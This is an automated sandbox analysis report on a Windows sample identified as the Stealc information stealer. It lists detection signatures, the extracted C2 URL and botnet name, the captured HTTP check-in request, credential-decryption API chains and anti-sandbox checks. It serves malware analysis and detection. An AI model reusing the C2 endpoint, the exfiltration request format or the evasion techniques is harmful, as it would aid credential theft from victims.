
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543430
MD5: 7e247ce0bfb04ead4760a9bd841ece58
SHA1: 41708946a0ab26f707350236bc2f0455e1381cc7
SHA256: bcc2e1473d790771507934707e46e5bd0a710141fe776d5b37d14d5aeda8f82a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7E247CE0BFB04EAD4760A9BD841ECE58)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |
00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7280 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7280 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
0.2.file.exe.4c0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-27T21:06:07.833529+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP


                AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.4c0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004D9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004CA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004C72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004CA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_004CC920
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004D40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004CE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004C1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004D47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004CF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004D4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004D3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004CDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004CBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004CEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004CDF10

                Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 44 45 30 38 32 46 36 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="hwid"493DE082F6451388941053------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build"tale------IDBKFHJEBAAEBGDGDBFB--
Source: Joe Sandbox View IP Address: 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004C62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 44 45 30 38 32 46 36 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="hwid"493DE082F6451388941053------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build"tale------IDBKFHJEBAAEBGDGDBFB--
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                Source: file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/O
                Source: file.exe, 00000000.00000002.1731343295.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=DMJ
                Source: file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B50_2_0091D0B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005000980_2_00500098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084105C0_2_0084105C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009181880_2_00918188
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F21380_2_004F2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051B1980_2_0051B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E2580_2_0052E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008902E20_2_008902E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005042880_2_00504288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008073D90_2_008073D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054B3080_2_0054B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090C3160_2_0090C316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053D39E0_2_0053D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008764EC0_2_008764EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE5440_2_004EE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E45730_2_004E4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009115630_2_00911563
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005045A80_2_005045A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D5A80_2_0052D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053A6480_2_0053A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091B6D20_2_0091B6D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005066C80_2_005066C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005496FD0_2_005496FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051D7200_2_0051D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009167300_2_00916730
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005367990_2_00536799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009207460_2_00920746
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005148680_2_00514868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052F8D60_2_0052F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005198B80_2_005198B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051B8A80_2_0051B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F59A60_2_008F59A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F9FD0_2_0090F9FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00833AB40_2_00833AB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00919BF80_2_00919BF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B3B0_2_00914B3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00530B880_2_00530B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082DB730_2_0082DB73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534BA80_2_00534BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EDC860_2_008EDC86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091ECC60_2_0091ECC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053AC280_2_0053AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F1D780_2_004F1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051BD680_2_0051BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052AD380_2_0052AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514DC80_2_00514DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00515DB90_2_00515DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00508E780_2_00508E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00531EE80_2_00531EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912FE30_2_00912FE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DF010_2_0090DF01
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004C4610 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: iecwsxsj ZLIB complexity 0.9950547911015672
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004D9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_004D3970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\M1J7PYR2.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe Static file information: File size 2137600 > 1048576
Source: file.exe Static PE information: Raw size of iecwsxsj is bigger than: 0x100000 < 0x19ec00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iecwsxsj:EW;qghwgbxt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iecwsxsj:EW;qghwgbxt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D9BB0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x21844d should be: 0x2195bb
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: iecwsxsj
Source: file.exe Static PE information: section name: qghwgbxt
Source: file.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], 4DB5F6D8h0_2_0091D103
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 68C85DEFh; mov dword ptr [esp], ecx0_2_0091D186
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebx; mov dword ptr [esp], edi0_2_0091D1D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], edi0_2_0091D20B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], ebp0_2_0091D2F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], ebp0_2_0091D338
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebp; mov dword ptr [esp], eax0_2_0091D448
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 22739E50h; mov dword ptr [esp], esp0_2_0091D4D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], edx0_2_0091D503
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], ecx0_2_0091D569
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edi; mov dword ptr [esp], eax0_2_0091D5D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push esi; mov dword ptr [esp], esp0_2_0091D5DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], 00000000h0_2_0091D600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 128795D0h; mov dword ptr [esp], esi0_2_0091D624
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebx; mov dword ptr [esp], 5B40016Ah0_2_0091D6A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], eax0_2_0091D6C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 4A0DBB9Ch; mov dword ptr [esp], edi0_2_0091D72D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push esi; mov dword ptr [esp], edx0_2_0091D731
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebp; mov dword ptr [esp], esi0_2_0091D7A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], esi0_2_0091D7AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push esi; mov dword ptr [esp], ecx0_2_0091D7B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edi; mov dword ptr [esp], 2967CB53h0_2_0091D93F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 13F4EF7Ch; mov dword ptr [esp], ecx0_2_0091D9B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], ebx0_2_0091DA27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], ecx0_2_0091DA84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebp; mov dword ptr [esp], esp0_2_0091DA8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], 28919865h0_2_0091DB94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 3DF5E9EFh; mov dword ptr [esp], edi0_2_0091DC06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], edi0_2_0091DC10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 65BA36DBh; mov dword ptr [esp], edi0_2_0091DC7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], ecx0_2_0091DD16
Source: file.exe Static PE information: section name: iecwsxsj entropy: 7.954930403224227

                Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D9BB0

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-36337
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DB53 second address: 96DB71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007FBD3853A986h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007FBD3853A986h 0x0000001e rdtsc
